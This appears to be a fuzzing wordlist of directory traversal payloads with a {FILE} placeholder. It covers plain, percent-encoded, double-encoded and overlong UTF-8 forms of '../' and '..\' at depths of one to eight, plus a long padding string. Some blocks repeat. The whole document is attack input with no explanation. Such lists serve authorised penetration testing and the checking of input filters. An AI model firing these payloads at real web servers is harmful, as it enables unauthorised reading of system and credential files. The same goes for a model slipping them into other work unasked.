%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
